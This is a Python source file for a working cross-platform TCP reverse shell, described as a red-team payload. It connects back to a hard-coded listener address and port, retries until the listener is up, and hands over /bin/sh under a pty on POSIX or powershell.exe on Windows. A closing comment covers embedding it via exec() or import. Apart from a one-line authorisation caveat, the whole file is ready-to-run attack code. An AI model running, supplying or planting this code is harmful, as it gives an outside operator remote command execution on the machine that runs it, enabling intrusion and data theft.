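"""Cross-platform TCP reverse shell (pentest / red-team payload).

When run, it connects back to ``RHOST``:``RPORT`` and attaches a shell to the
socket: ``/bin/sh`` inside a pty on POSIX, ``powershell.exe`` bridged through
pipes on Windows.  Use it only against hosts you are explicitly authorised to
test.  Listen with e.g. ``nc -lvnp 1337``; connecting retries until the
listener is up.
"""
from __future__ import annotations

import codecs
import contextlib
import os
import socket
import subprocess
import threading
import time
from sys import platform

RHOST = "192.168.88.2"  # listener (operator-side) address
RPORT = 1337            # listener port
RETRY_DELAY = 2.0       # seconds between connect attempts while the listener is down


def connect_back(
    host: str = RHOST,
    port: int = RPORT,
    retry_delay: float = RETRY_DELAY,
    max_attempts: int | None = None,
) -> socket.socket:
    """Return a TCP socket connected to ``host``:``port``.

    Retries on connection errors, sleeping ``retry_delay`` seconds between
    attempts instead of spinning (the previous Windows loop did ``except: pass``
    in a tight loop, which pegs a core).  ``max_attempts=None`` retries
    forever; otherwise the last error is re-raised once the budget is used up.

    Raises:
        OSError: no connection after ``max_attempts`` tries.
    """
    attempt = 0
    while True:
        attempt += 1
        try:
            return socket.create_connection((host, port))
        except OSError:
            # Refused / unreachable: the listener is not up yet.
            if max_attempts is not None and attempt >= max_attempts:
                raise
            time.sleep(retry_delay)


def forward_socket_to_process(sock: socket.socket, proc) -> None:
    """Copy listener input from ``sock`` into ``proc.stdin`` until the peer closes.

    Bytes are decoded incrementally, so a multi-byte UTF-8 character split
    across two ``recv`` calls is reassembled instead of raising
    ``UnicodeDecodeError`` (undecodable bytes become U+FFFD).  On EOF or a
    socket error ``proc.stdin`` is closed so the shell sees end-of-input and
    exits, which lets ``proc.wait()`` in the caller return; previously a
    closed peer left this loop writing empty strings forever.
    """
    decoder = codecs.getincrementaldecoder("utf-8")(errors="replace")
    try:
        while True:
            data = sock.recv(4096)
            if not data:
                break  # peer closed the connection
            proc.stdin.write(decoder.decode(data))
            proc.stdin.flush()
    except OSError:
        pass  # socket torn down underneath us, or the shell already died
    finally:
        with contextlib.suppress(OSError):
            proc.stdin.close()


def forward_process_to_socket(sock: socket.socket, proc) -> None:
    """Copy the shell's merged stdout/stderr from ``proc.stdout`` to ``sock``.

    ``read(1)`` is deliberate: in text mode ``read(n)`` blocks until ``n``
    characters (or EOF) arrive, so a larger read would hold output back.
    Stops at EOF (the shell exited) or when the socket is gone.  ``sendall``
    replaces ``send``, which may write only part of a buffer.
    """
    try:
        while True:
            chunk = proc.stdout.read(1)
            if not chunk:
                break  # EOF: the shell exited
            sock.sendall(chunk.encode())
    except OSError:
        pass  # peer went away; the caller reaps the process


def spawn_windows_shell(sock: socket.socket) -> None:
    """Bridge ``powershell.exe`` to ``sock``; returns when the shell exits.

    ``shell=True`` was dropped: with a list argv it only wrapped powershell in
    an extra ``cmd.exe`` that adds nothing but one more process in the tree.
    The pump threads are daemons so a stuck pump cannot keep the process alive.
    """
    proc = subprocess.Popen(
        ["powershell.exe"],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,  # one merged stream back to the listener
        text=True,
    )
    pumps = (
        threading.Thread(target=forward_socket_to_process, args=(sock, proc), daemon=True),
        threading.Thread(target=forward_process_to_socket, args=(sock, proc), daemon=True),
    )
    for pump in pumps:
        pump.start()
    proc.wait()


def spawn_posix_shell(sock: socket.socket) -> None:
    """Point fds 0, 1 and 2 at ``sock`` and run ``/bin/sh`` under a pty.

    Returns when the shell exits.  ``pty.spawn`` runs the shell on a
    pseudo-terminal rather than a bare pipe, so tty-dependent programs work.
    """
    import pty  # POSIX-only module, hence imported here rather than at the top

    for fd in (0, 1, 2):
        os.dup2(sock.fileno(), fd)
    pty.spawn("/bin/sh")


def main() -> None:
    """Connect back to the listener and hand the connection to the platform's shell."""
    sock = connect_back()
    try:
        if platform == "win32":
            spawn_windows_shell(sock)
        else:
            spawn_posix_shell(sock)
    finally:
        sock.close()


# The previous version connected at load time.  If this file is embedded via
# exec()/import under another __name__, call main() explicitly.
if __name__ == "__main__":
    main()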